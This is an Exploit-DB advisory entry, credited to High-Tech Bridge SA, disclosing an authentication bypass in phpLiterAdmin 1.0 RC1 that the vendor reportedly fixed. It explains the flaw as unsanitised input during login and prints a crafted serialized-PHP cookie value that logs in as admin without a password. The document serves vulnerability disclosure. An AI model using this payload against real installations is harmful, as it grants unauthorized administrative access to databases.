phpLiterAdmin 1.0 RC1 - Authentication Bypass

EDB-ID:

15322

CVE:

N/A

EDB Verified:

Author:

High-Tech Bridge SA

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-10-27

Vulnerable App: 
Vulnerability ID: HTB22653
Reference: http://www.htbridge.ch/advisory/authentication_bypass_in_phpliteradmin.html
Product: phpLiterAdmin 
Vendor: phpLiterAdmin  ( http://code.google.com/p/phpliteradmin/ ) 
Vulnerable Version: 1.0 RC1 and probably prior versions 
Vendor Notification: 13 October 2010 
Vulnerability Type: Authentication bypass
Status: Fixed by Vendor
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
phpLiterAdmin is affected by an authentication bypass vulnerability.
This issue is due to the application failing to properly sanitize user-supplied input during authentication.
Exploitation of this vulnerability would permit unauthorized access to any known account.

Authentication can be bypassed by setting the special crafted cookies:


phpLiterAdmin432=a:2:{s:8:"username"%3bs:5:"admin"%3bs:8:"password"%3bb:1%3b};

Solution: Upgrade to the most recent version
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services